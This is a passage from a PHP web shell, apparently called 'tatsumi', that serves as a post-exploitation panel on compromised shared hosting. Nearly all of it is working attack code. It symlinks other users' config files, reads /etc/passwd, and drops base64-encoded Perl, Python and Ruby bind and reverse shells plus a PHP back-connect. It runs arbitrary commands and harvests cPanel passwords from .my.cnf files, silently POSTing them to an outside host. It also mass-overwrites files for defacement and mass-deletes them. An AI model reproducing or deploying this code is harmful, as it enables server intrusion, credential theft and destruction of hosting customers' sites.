  1121.     $htaccess="Options Indexes FollowSymLinks
  1122. DirectoryIndex tatsumi.htm
  1123. HeaderName tatsumi.txt
  1124. Satisfy Any
  1125. IndexOptions IgnoreCase FancyIndexing FoldersFirst NameWidth=* DescriptionWidth=* SuppressHTMLPreamble
  1126. IndexIgnore *";
  1127.  
  1128. @file_put_contents("tatsumi_sym404/".$user_tatsumi."-".$nama_config.".txt404/.htaccess",$htaccess);
  1129.  
  1130. @symlink($config,"tatsumi_sym404/".$user_tatsumi."-".$nama_config.".txt404/tatsumi.txt");
  1131.  
  1132.     }
  1133.  
  1134. }
  1135.  
  1136.                     }    
  1137.         }  if($_POST['config'] == 'grab') {
  1138.             echo "<center><a href='?path=$path/tatsumi_configgrab'><font color=lime>Done</font></a></center>";
  1139.         }
  1140.     if($_POST['config'] == '404') {
  1141.         echo "<center>
  1142. <a href=\"tatsumi_sym404/root/\">SymlinkNya</a>
  1143. <br><a href=\"tatsumi_sym404/\">Configurations</a></center>";
  1144.     }
  1145.      if($_POST['config'] == 'symlink') {
  1146. echo "<center>
  1147. <a href=\"tatsumi_symconfig/root/\">Symlinknya</a>
  1148. <br><a href=\"tatsumi_symconfig/\">Configurations</a></center>";
  1149.             }if($_POST['config'] == 'symvhost') {
  1150. echo "<center>
  1151. <a href=\"tatsumi_symvhost/root/\">Root Server</a>
  1152. <br><a href=\"tatsumi_symvhost/\">Configurations</a></center>";
  1153.             }
  1154.        
  1155.        
  1156.         }else{
  1157.         echo "<form method=\"post\" action=\"\">
  1158.         <center></select><br><textarea name=\"passwd\" class='area' rows='15' cols='60'>\n";
  1159.         echo include("/etc/passwd");
  1160.         echo "</textarea></center><br><br><center>
  1161.         <select class=\"select\" name=\"config\"  style=\"width: 450px;\" height=\"10\">
  1162.         <option value=\"grab\">Config Grab</option>
  1163.         <option value=\"symlink\">Symlink Config</option>
  1164.                 <option value=\"404\">Config 404</option>
  1165.                 <option value=\"symvhosts\">Vhosts Config Grabber</center></select><br></br>
  1166.                 <input type=\"submit\" value=\"GASS!!\"></td></tr></center>\n";
  1167. }
  1168. } elseif($_GET['jancok'] == 'jumping') {
  1169.     $i = 0;
  1170.     echo "<pre><div class='margin: 5px auto;'>";
  1171.     $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
  1172.     while($passwd = fgets($etc)) {
  1173.         if($passwd == '' || !$etc) {
  1174.             echo "<font color=red>Can't read /etc/passwd</font>";
  1175.         } else {
  1176.             preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
  1177.             foreach($user_jumping[1] as $user_tatsumi_jump) {
  1178.                 $user_jumping_dir = "/home/$user_tatsumi_jump/public_html";
  1179.                 if(is_readable($user_jumping_dir)) {
  1180.                     $i++;
  1181.                     $jrw = "[<font color=white>R</font>] <a href='?path=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  1182.                     if(is_writable($user_jumping_dir)) {
  1183.                         $jrw = "[<font color=white>RW</font>] <a href='?path=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  1184.                     }
  1185.                     echo $jrw;
  1186.                     if(function_exists('posix_getpwuid')) {
  1187.                         $domain_jump = file_get_contents("/etc/named.conf");   
  1188.                         if($domain_jump == '') {
  1189.                             echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
  1190.                         } else {
  1191.                             preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
  1192.                             foreach($domains_jump[1] as $dj) {
  1193.                                 $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  1194.                                 $user_jumping_url = $user_jumping_url['name'];
  1195.                                 if($user_jumping_url == $user_tatsumi_jump) {
  1196.                                     echo " => ( <u>$dj</u> )<br>";
  1197.                                     break;
  1198.                                 }
  1199.                             }
  1200.                         }
  1201.                     } else {
  1202.                         echo "<br>";
  1203.                     }
  1204.                 }
  1205.             }
  1206.         }
  1207.     }
  1208.     if($i == 0) {
  1209.     } else {
  1210.         echo "<br>Total ada ".$i." Kamar di ".gethostbyname($_SERVER['HTTP_HOST'])."";
  1211.     }
  1212.     echo "</div></pre>";
  1213. } elseif($_GET['backconnect'] == 'tool'){
  1214. echo "<br><br><center><form method=post>
  1215. <br>    <span>Bind port to /bin/sh [Perl]</span><br/>
  1216.     Port: <input type='text' name='port' value='443'> <input type=submit name=bpl value='>>'>
  1217. <br><br>
  1218.         <span>Back-connect</span><br/>
  1219.     Server: <input type='text' name='server' placeholder='". $_SERVER['REMOTE_ADDR'] ."'> Port: <input type='text' name='port' placeholder='443'><select class='select' name='backconnect'  style='width: 100px;' height='10'><option value='perl'>Perl</option><option value='php'>PHP</option><option value='python'>Python</option><option value='ruby'>Ruby</option></select>
  1220.    <input type=submit value='>>'>";
  1221.     if($_POST['bpl']) {
  1222.     $bp=base64_decode("IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=");
  1223.     $brt=@fopen('bp.pl','w');
  1224. fwrite($brt,$bp);
  1225. $out = exe("perl bp.pl ".$_POST['port']." 1>/dev/null 2>&1 &");
  1226. sleep(1);
  1227. echo "<pre>$out\n".exe("ps aux | grep bp.pl")."</pre>";
  1228. unlink("bp.pl");
  1229.         }
  1230.         if($_POST['backconnect'] == 'perl') {
  1231. $bc=base64_decode("IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7");
  1232. $plbc=@fopen('bc.pl','w');
  1233. fwrite($plbc,$bc);
  1234. $out = exe("perl bc.pl ".$_POST['server']." ".$_POST['port']." 1>/dev/null 2>&1 &");
  1235. sleep(1);
  1236. echo "<pre>$out\n".exe("ps aux | grep bc.pl")."</pre>";
  1237. unlink("bc.pl");
  1238. }
  1239. if($_POST['backconnect'] == 'python') {
  1240. $becaa=base64_decode("IyEvdXNyL2Jpbi9weXRob24NCiNVc2FnZTogcHl0aG9uIGZpbGVuYW1lLnB5IEhPU1QgUE9SVA0KaW1wb3J0IHN5cywgc29ja2V0LCBvcywgc3VicHJvY2Vzcw0KaXBsbyA9IHN5cy5hcmd2WzFdDQpwb3J0bG8gPSBpbnQoc3lzLmFyZ3ZbMl0pDQpzb2NrZXQuc2V0ZGVmYXVsdHRpbWVvdXQoNjApDQpkZWYgcHliYWNrY29ubmVjdCgpOg0KICB0cnk6DQogICAgam1iID0gc29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pDQogICAgam1iLmNvbm5lY3QoKGlwbG8scG9ydGxvKSkNCiAgICBqbWIuc2VuZCgnJydcblB5dGhvbiBCYWNrQ29ubmVjdCBCeSBDb243ZXh0IC0gWGFpIFN5bmRpY2F0ZVxuVGhhbmtzIEdvb2dsZSBGb3IgUmVmZXJlbnNpXG5cbicnJykNCiAgICBvcy5kdXAyKGptYi5maWxlbm8oKSwwKQ0KICAgIG9zLmR1cDIoam1iLmZpbGVubygpLDEpDQogICAgb3MuZHVwMihqbWIuZmlsZW5vKCksMikNCiAgICBvcy5kdXAyKGptYi5maWxlbm8oKSwzKQ0KICAgIHNoZWxsID0gc3VicHJvY2Vzcy5jYWxsKFsiL2Jpbi9zaCIsIi1pIl0pDQogIGV4Y2VwdCBzb2NrZXQudGltZW91dDoNCiAgICBwcmludCAiVGltT3V0Ig0KICBleGNlcHQgc29ja2V0LmVycm9yLCBlOg0KICAgIHByaW50ICJFcnJvciIsIGUNCnB5YmFja2Nvbm5lY3QoKQ==");
  1241. $pbcaa=@fopen('bcpyt.py','w');
  1242. fwrite($pbcaa,$becaa);
  1243. $out1 = exe("python bcpyt.py ".$_POST['server']." ".$_POST['port']);
  1244. sleep(1);
  1245. echo "<pre>$out1\n".exe("ps aux | grep bcpyt.py")."</pre>";
  1246. unlink("bcpyt.py");
  1247. }
  1248. if($_POST['backconnect'] == 'ruby') {
  1249. $becaak=base64_decode("IyEvdXNyL2Jpbi9lbnYgcnVieQ0KIyBkZXZpbHpjMGRlLm9yZyAoYykgMjAxMg0KIw0KIyBiaW5kIGFuZCByZXZlcnNlIHNoZWxsDQojIGIzNzRrDQpyZXF1aXJlICdzb2NrZXQnDQpyZXF1aXJlICdwYXRobmFtZScNCg0KZGVmIHVzYWdlDQoJcHJpbnQgImJpbmQgOlxyXG4gIHJ1YnkgIiArIEZpbGUuYmFzZW5hbWUoX19GSUxFX18pICsgIiBbcG9ydF1cclxuIg0KCXByaW50ICJyZXZlcnNlIDpcclxuICBydWJ5ICIgKyBGaWxlLmJhc2VuYW1lKF9fRklMRV9fKSArICIgW3BvcnRdIFtob3N0XVxyXG4iDQplbmQNCg0KZGVmIHN1Y2tzDQoJc3Vja3MgPSBmYWxzZQ0KCWlmIFJVQllfUExBVEZPUk0uZG93bmNhc2UubWF0Y2goJ21zd2lufHdpbnxtaW5ndycpDQoJCXN1Y2tzID0gdHJ1ZQ0KCWVuZA0KCXJldHVybiBzdWNrcw0KZW5kDQoNCmRlZiByZWFscGF0aChzdHIpDQoJcmVhbCA9IHN0cg0KCWlmIEZpbGUuZXhpc3RzPyhzdHIpDQoJCWQgPSBQYXRobmFtZS5uZXcoc3RyKQ0KCQlyZWFsID0gZC5yZWFscGF0aC50b19zDQoJZW5kDQoJaWYgc3Vja3MNCgkJcmVhbCA9IHJlYWwuZ3N1YigvXC8vLCJcXCIpDQoJZW5kDQoJcmV0dXJuIHJlYWwNCmVuZA0KDQppZiBBUkdWLmxlbmd0aCA9PSAxDQoJaWYgQVJHVlswXSA9fiAvXlswLTldezEsNX0kLw0KCQlwb3J0ID0gSW50ZWdlcihBUkdWWzBdKQ0KCWVsc2UNCgkJdXNhZ2UNCgkJcHJpbnQgIlxyXG4qKiogZXJyb3IgOiBQbGVhc2UgaW5wdXQgYSB2YWxpZCBwb3J0XHJcbiINCgkJZXhpdA0KCWVuZA0KCXNlcnZlciA9IFRDUFNlcnZlci5uZXcoIiIsIHBvcnQpDQoJcyA9IHNlcnZlci5hY2NlcHQNCglwb3J0ID0gcy5wZWVyYWRkclsxXQ0KCW5hbWUgPSBzLnBlZXJhZGRyWzJdDQoJcy5wcmludCAiKioqIGNvbm5lY3RlZFxyXG4iDQoJcHV0cyAiKioqIGNvbm5lY3RlZCA6ICN7bmFtZX06I3twb3J0fVxyXG4iDQoJYmVnaW4NCgkJaWYgbm90IHN1Y2tzDQoJCQlmID0gcy50b19pDQoJCQlleGVjIHNwcmludGYoIi9iaW4vc2ggLWkgXDxcJiVkIFw+XCYlZCAyXD5cJiVkIixmLGYsZikNCgkJZWxzZQ0KCQkJcy5wcmludCAiXHJcbiIgKyByZWFscGF0aCgiLiIpICsgIj4iDQoJCQl3aGlsZSBsaW5lID0gcy5nZXRzDQoJCQkJcmFpc2UgZXJyb3JCcm8gaWYgbGluZSA9fiAvXmRpZVxyPyQvDQoJCQkJaWYgbm90IGxpbmUuY2hvbXAgPT0gIiINCgkJCQkJaWYgbGluZSA9fiAvY2QgLiovaQ0KCQkJCQkJbGluZSA9IGxpbmUuZ3N1YigvY2QgL2ksICcnKS5jaG9tcA0KCQkJCQkJaWYgRmlsZS5kaXJlY3Rvcnk/KGxpbmUpDQoJCQkJCQkJbGluZSA9IHJlYWxwYXRoKGxpbmUpDQoJCQkJCQkJRGlyLmNoZGlyKGxpbmUpDQoJCQkJCQllbmQNCgkJCQkJCXMucHJpbnQgIlxyXG4iICsgcmVhbHBhdGgoIi4iKSArICI+Ig0KCQkJCQllbHNpZiBsaW5lID1+IC9cdzouKi9pDQoJCQkJCQlpZiBGaWxlLmRpcmVjdG9yeT8obGluZS5jaG9tcCkNCgkJCQkJCQlEaXIuY2hkaXIobGluZS5jaG9tcCkNCgkJCQkJCWVuZA0KCQkJCQkJcy5wcmludCAiXHJcbiIgKyByZWFscGF0aCgiLiIpICsgIj4iDQoJCQkJCWVsc2UNCgkJCQkJCUlPLnBvcGVuKGxpbmUsInIiKXt8aW98cy5wcmludCBpby5yZWFkICsgIlxyXG4iICsgcmVhbHBhdGgoIi4iKSArICI+In0NCgkJCQkJZW5kDQoJCQkJZW5kDQoJCQllbmQNCgkJZW5kDQoJcmVzY3VlIGVycm9yQnJvDQoJCXB1dHMgIioqKiAje25hbWV9OiN7cG9ydH0gZGlzY29ubmVjdGVkIg0KCWVuc3VyZQ0KCQlzLmNsb3NlDQoJCXMgPSBuaWwNCgllbmQNCmVsc2lmIEFSR1YubGVuZ3RoID09IDINCglpZiBBUkdWWzBdID1+IC9eWzAtOV17MSw1fSQvDQoJCXBvcnQgPSBJbnRlZ2VyKEFSR1ZbMF0pDQoJCWhvc3QgPSBBUkdWWzFdDQoJZWxzaWYgQVJHVlsxXSA9fiAvXlswLTldezEsNX0kLw0KCQlwb3J0ID0gSW50ZWdlcihBUkdWWzFdKQ0KCQlob3N0ID0gQVJHVlswXQ0KCWVsc2UNCgkJdXNhZ2UNCgkJcHJpbnQgIlxyXG4qKiogZXJyb3IgOiBQbGVhc2UgaW5wdXQgYSB2YWxpZCBwb3J0XHJcbiINCgkJZXhpdA0KCWVuZA0KCXMgPSBUQ1BTb2NrZXQubmV3KCIje2hvc3R9IiwgcG9ydCkNCglwb3J0ID0gcy5wZWVyYWRkclsxXQ0KCW5hbWUgPSBzLnBlZXJhZGRyWzJdDQoJcy5wcmludCAiKioqIGNvbm5lY3RlZFxyXG4iDQoJcHV0cyAiKioqIGNvbm5lY3RlZCA6ICN7bmFtZX06I3twb3J0fSINCgliZWdpbg0KCQlpZiBub3Qgc3Vja3MNCgkJCWYgPSBzLnRvX2kNCgkJCWV4ZWMgc3ByaW50ZigiL2Jpbi9zaCAtaSBcPFwmJWQgXD5cJiVkIDJcPlwmJWQiLCBmLCBmLCBmKQ0KCQllbHNlDQoJCQlzLnByaW50ICJcclxuIiArIHJlYWxwYXRoKCIuIikgKyAiPiINCgkJCXdoaWxlIGxpbmUgPSBzLmdldHMNCgkJCQlyYWlzZSBlcnJvckJybyBpZiBsaW5lID1+IC9eZGllXHI/JC8NCgkJCQlpZiBub3QgbGluZS5jaG9tcCA9PSAiIg0KCQkJCQlpZiBsaW5lID1+IC9jZCAuKi9pDQoJCQkJCQlsaW5lID0gbGluZS5nc3ViKC9jZCAvaSwgJycpLmNob21wDQoJCQkJCQlpZiBGaWxlLmRpcmVjdG9yeT8obGluZSkNCgkJCQkJCQlsaW5lID0gcmVhbHBhdGgobGluZSkNCgkJCQkJCQlEaXIuY2hkaXIobGluZSkNCgkJCQkJCWVuZA0KCQkJCQkJcy5wcmludCAiXHJcbiIgKyByZWFscGF0aCgiLiIpICsgIj4iDQoJCQkJCWVsc2lmIGxpbmUgPX4gL1x3Oi4qL2kNCgkJCQkJCWlmIEZpbGUuZGlyZWN0b3J5PyhsaW5lLmNob21wKQ0KCQkJCQkJCURpci5jaGRpcihsaW5lLmNob21wKQ0KCQkJCQkJZW5kDQoJCQkJCQlzLnByaW50ICJcclxuIiArIHJlYWxwYXRoKCIuIikgKyAiPiINCgkJCQkJZWxzZQ0KCQkJCQkJSU8ucG9wZW4obGluZSwiciIpe3xpb3xzLnByaW50IGlvLnJlYWQgKyAiXHJcbiIgKyByZWFscGF0aCgiLiIpICsgIj4ifQ0KCQkJCQllbmQNCgkJCQllbmQNCgkJCWVuZA0KCQllbmQNCglyZXNjdWUgZXJyb3JCcm8NCgkJcHV0cyAiKioqICN7bmFtZX06I3twb3J0fSBkaXNjb25uZWN0ZWQiDQoJZW5zdXJlDQoJCXMuY2xvc2UNCgkJcyA9IG5pbA0KCWVuZA0KZWxzZQ0KCXVzYWdlDQoJZXhpdA0KZW5k");
  1250. $pbcaak=@fopen('bcruby.rb','w');
  1251. fwrite($pbcaak,$becaak);
  1252. $out2 = exe("ruby bcruby.rb ".$_POST['server']." ".$_POST['port']);
  1253. sleep(1);
  1254. echo "<pre>$out2\n".exe("ps aux | grep bcruby.rb")."</pre>";
  1255. unlink("bcruby.rb");
  1256. }
  1257. if($_POST['backconnect'] == 'php') {
  1258.             $ip = $_POST['server'];
  1259.             $port = $_POST['port'];
  1260.             $sockfd = fsockopen($ip , $port , $errno, $errstr );
  1261.             if($errno != 0){
  1262.               echo "<font color='red'>$errno : $errstr</font>";
  1263.             } else if (!$sockfd)  {
  1264.               $result = "<p>Unexpected error has occured, connection may have failed.</p>";
  1265.             } else {
  1266.               fputs ($sockfd ,"
  1267.                 \n{################################################################}
  1268.                 \n..:: BackConnect Php By tatsumi ::..
  1269.                 \n{################################################################}\n");
  1270.               $dir = shell_exec("pwd");
  1271.               $sysinfo = shell_exec("uname -a");
  1272.               $time = Shell_exec("time");
  1273.               $len = 1337;
  1274.               fputs($sockfd, "User ", $sysinfo, "connected @ ", $time, "\n\n");
  1275.               while(!feof($sockfd)){ $cmdPrompt = '[tatsumi]#:> ';
  1276.               fputs ($sockfd , $cmdPrompt );
  1277.               $command= fgets($sockfd, $len);
  1278.               fputs($sockfd , "\n" . shell_exec($command) . "\n\n");
  1279.             }
  1280.             fclose($sockfd);
  1281.             }
  1282.           }
  1283.         echo "</p></div>";
  1284. } elseif($_GET['jancok'] == 'adminer') {
  1285.     $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  1286.     function adminer($url, $isi) {
  1287.         $fp = fopen($isi, "w");
  1288.         $ch = curl_init();
  1289.               curl_setopt($ch, CURLOPT_URL, $url);
  1290.               curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
  1291.               curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  1292.               curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  1293.               curl_setopt($ch, CURLOPT_FILE, $fp);
  1294.         return curl_exec($ch);
  1295.               curl_close($ch);
  1296.         fclose($fp);
  1297.         ob_flush();
  1298.         flush();
  1299.     }
  1300.     if(file_exists('adminer.php')) {
  1301.         echo "<center><font color=white><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  1302.     } else {
  1303.         if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
  1304.             echo "<center><font color=white><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  1305.         } else {
  1306.             echo "<center><font color=red>gagal buat file adminer</font></center>";
  1307.         }
  1308.     }
  1309. } elseif($_GET['jancok'] == 'cmd') {
  1310.     echo "<form method='post'><center></br>
  1311.     <font style='text-decoration: underline;'>".$user."@".$ip.": ~ $ </font>
  1312.     <input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'>
  1313.     </form><center>";
  1314.     if($_POST['do_cmd']) {
  1315.         echo "<pre>".exe($_POST['cmd'])."</pre>";
  1316.     }
  1317. }
  1318. elseif($_GET['jancok'] == 'cpanel') {
  1319. @ini_set('display_errors',0);
  1320. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
  1321.     $ar0=explode($marqueurDebutLien, $text);
  1322.     $ar1=explode($marqueurFinLien, $ar0[$i]);
  1323.     return trim($ar1[0]);
  1324. }
  1325. echo '<br><br><style>
  1326. textarea {
  1327. resize:none;
  1328. color:black;
  1329. background-color:#ffffff;  
  1330. font-size:8pt; color:black;
  1331. border:1px solid white ;
  1332. border-left: 4px solid white ;
  1333. }
  1334. input {
  1335. color: black;
  1336. border:1px dotted white;
  1337. }
  1338. </style>';
  1339. echo '<center>';
  1340. $d0mains = @file('/etc/named.conf');
  1341. $domains = scandir("/var/named");
  1342. if ($domains or $d0mains)
  1343. {
  1344.     $domains = scandir("/var/named");
  1345.     if($domains) {
  1346. echo "<table align=center><tr><th valign=top  class=style2> COUNT </th><th valign=top > DOMAIN </th><th valign=top class=style2 > USER </th><th valign=top class=style2 > Password </th><th valign=top class=style2 > .my.cnf </th></tr>";
  1347. $count=1;
  1348. $dc = 0;
  1349. $list = scandir("/var/named");
  1350. foreach($list as $domain){
  1351. if(strpos($domain,".db")){
  1352. $domain = str_replace('.db','',$domain);
  1353. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
  1354. $dirz = '/home/'.$owner['name'].'/.my.cnf';
  1355. $path = getcwd();
  1356. if (is_readable($dirz)) {
  1357. copy($dirz, ''.$path.'/'.$owner['name'].'.txt');
  1358. $p=file_get_contents(''.$path.'/'.$owner['name'].'.txt');
  1359. $password=entre2v2($p,'password="','"');
  1360. echo "<tr><td valign=top style=border :2px solid white; width: 139px class=style2>".$count++."</td><td valign=top style= width: 139px; border :2px solid white  class=style2 ><a href=http://".$domain.":2082 target=_blank>".$domain."</a></td><td valign=top style= width: 139px; border: 2px solid white  class=style2 >".$owner['name']."</td><td valign=top style= width: 139px; border: 2px solid white  class=style2 >".$password."</td><td valign=top style=border :2px solid white style=width: 139px><a href=".$owner['name'].".txt target=_blank>Click Here</a></td></tr>";
  1361. $dc++;
  1362. $success3="http://".$domain."|".$owner['name']."|".$password."\n";
  1363. $ch = curl_init();
  1364. curl_setopt($ch, CURLOPT_URL,"http://ww3s.ws/ok.php");
  1365. curl_setopt($ch,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 5.1; rv:18.0) Gecko/20100101 Firefox/18.0');
  1366. curl_setopt($ch, CURLOPT_POST, 1);
  1367. curl_setopt($ch, CURLOPT_POSTFIELDS,"result=".base64_encode($success3));
  1368. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1369. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  1370. curl_setopt($ch, CURLOPT_HEADER, 1);
  1371. $buffer = curl_exec($ch);
  1372. }
  1373. }
  1374. }
  1375. echo '</table>';
  1376. $total = $dc;
  1377.  
  1378. echo '</center>';
  1379. }else{
  1380. $d0mains = @file('/etc/named.conf');
  1381.     if($d0mains) {
  1382. echo "<table align=center><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> Password </th><th> .my.cnf </th></tr>";
  1383. $count=1;
  1384. $dc = 0;
  1385. $mck = array();
  1386. foreach($d0mains as $d0main){
  1387.     if(@eregi('zone',$d0main)){
  1388.         preg_match_all('#zone "(.*)"#',$d0main,$domain);
  1389.         flush();
  1390.         if(strlen(trim($domain[1][0])) >2){
  1391.             $mck[] = $domain[1][0];
  1392.         }
  1393.     }
  1394. }
  1395. $mck = array_unique($mck);
  1396. $usr = array();
  1397. $dmn = array();
  1398. foreach($mck as $o) {
  1399.     $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o));
  1400.     $usr[] = $infos['name'];
  1401.     $dmn[] = $o;
  1402. }
  1403. array_multisort($usr,$dmn);
  1404. $dt = file('/etc/passwd');
  1405. $passwd = array();
  1406. foreach($dt as $d) {
  1407.     $r = explode(':',$d);
  1408.     if(strpos($r[5],'home')) {
  1409.         $passwd[$r[0]] = $r[5];
  1410.     }
  1411. }
  1412. $l=0;
  1413. $j=1;
  1414. foreach($usr as $r) {
  1415. $dirz = '/home/'.$r.'/.my.cnf';
  1416. $path = getcwd();
  1417. if (is_readable($dirz)) {
  1418. copy($dirz, ''.$path.'/'.$r.'.txt');
  1419. $p=file_get_contents(''.$path.'/'.$r.'.txt');
  1420. $password=entre2v2($p,'password="','"');
  1421. echo "<tr><td valign=top class=style2 style=width: 139px>".$count++."</td><td valign=top class=style2 style=width: 139px><a target=_blank href=http://".$dmn[$j-1].'/>'.$dmn[$j-1].' </a></td><td valign=top class=style2 style=width: 139px>'.$r."</td><td valign=top class=style2 style=width: 139px>".$password."</td><td valign=top class=style2 style=width: 139px><a href='".$r.".txt' target='_blank'>Click Here</a></td></tr>";
  1422. $dc++;
  1423.                 flush();
  1424.                 $l=$l?0:1;
  1425.                 $j++;
  1426.                 }
  1427.             }
  1428.             }
  1429. echo '</table>';
  1430. $total = $dc;
  1431. echo '<br><div class=result valign=top class=style2 style=width: 139px >Total cPanel Found = '.$total.'</h3><br />';
  1432. echo '</center>';
  1433. }
  1434.  
  1435. }else{
  1436. echo "<div class=result><i><font color=#FF0000>ERROR</font><br><font color=#FF0000>/var/named</font> or <font color=#FF0000>etc/named.conf</font> Not Accessible!</i></div>";
  1437. }
  1438. } elseif($_GET['jancok'] == 'mass') {
  1439.     echo "<center><form action=\"\" method=\"post\">\n";
  1440.     $dirr=$_POST['d_dir'];
  1441.     $index = $_POST["script"];
  1442.     $index = str_replace('"',"'",$index);
  1443.     $index = stripslashes($index);
  1444.     function edit_file($file,$index){
  1445.         if (is_writable($file)) {
  1446.         clear_fill($file,$index);
  1447.         echo "<Span style='color:green;'><strong> [+] Nyabun 100% Successfull </strong></span><br></center>";
  1448.         }
  1449.         else {
  1450.             echo "<Span style='color:red;'><strong> [-] Ternyata Tidak Boleh Menyabun Disini :( </strong></span><br></center>";
  1451.             }
  1452.             }
  1453.     function hapus_massal($dir,$namafile) {
  1454.         if(is_writable($dir)) {
  1455.             $dira = scandir($dir);
  1456.             foreach($dira as $dirb) {
  1457.                 $dirc = "$dir/$dirb";
  1458.                 $lokasi = $dirc.'/'.$namafile;
  1459.                 if($dirb === '.') {
  1460.                     if(file_exists("$dir/$namafile")) {
  1461.                         unlink("$dir/$namafile");
  1462.                     }
  1463.                 } elseif($dirb === '..') {
  1464.                     if(file_exists("".dirname($dir)."/$namafile")) {
  1465.                         unlink("".dirname($dir)."/$namafile");
  1466.                     }
  1467.                 } else {
  1468.                     if(is_dir($dirc)) {
  1469.                         if(is_writable($dirc)) {
  1470.                             if(file_exists($lokasi)) {
  1471.                                 echo "[<font color=lime>DELETED</font>] $lokasi<br>";
  1472.                                 unlink($lokasi);
  1473.                                 $idx = hapus_massal($dirc,$namafile);
  1474.                             }
  1475.                         }
  1476.                     }
  1477.                 }
  1478.             }
  1479.         }
  1480.     }
  1481.     function clear_fill($file,$index){
  1482.         if(file_exists($file)){
  1483.             $handle = fopen($file,'w');
  1484.             fwrite($handle,'');
  1485.             fwrite($handle,$index);
  1486.             fclose($handle);  } }
  1487.  
  1488.     function gass(){
  1489.         global $dirr , $index ;
  1490.         chdir($dirr);
  1491.         $me = str_replace(dirname(__FILE__).'/','',__FILE__);
  1492.         $files = scandir($dirr) ;
  1493.         $notallow = array(".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","..",".");
  1494.         sort($files);
  1495.         $n = 0 ;
  1496.         foreach ($files as $file){
  1497.             if ( $file != $me && is_dir($file) != 1 && !in_array($file, $notallow) ) {
  1498.                 echo "<center><Span style='color: #8A8A8A;'><strong>$dirr/</span>$file</strong> ====> ";
  1499.                 edit_file($file,$index);
  1500.                 flush();
  1501.                 $n = $n +1 ;
  1502.                 }
  1503.                 }
  1504.                 echo "<br>";
  1505.                 echo "<center><br><h3>$n Kali Anda Telah Ngecrot  Disini </h3></center><br>";
  1506.                     }
  1507.     function ListFiles($dirrall) {
  1508.  
  1509.     if($dh = opendir($dirrall)) {
  1510.  
  1511.        $files = Array();
  1512.        $inner_files = Array();
  1513.        $me = str_replace(dirname(__FILE__).'/','',__FILE__);
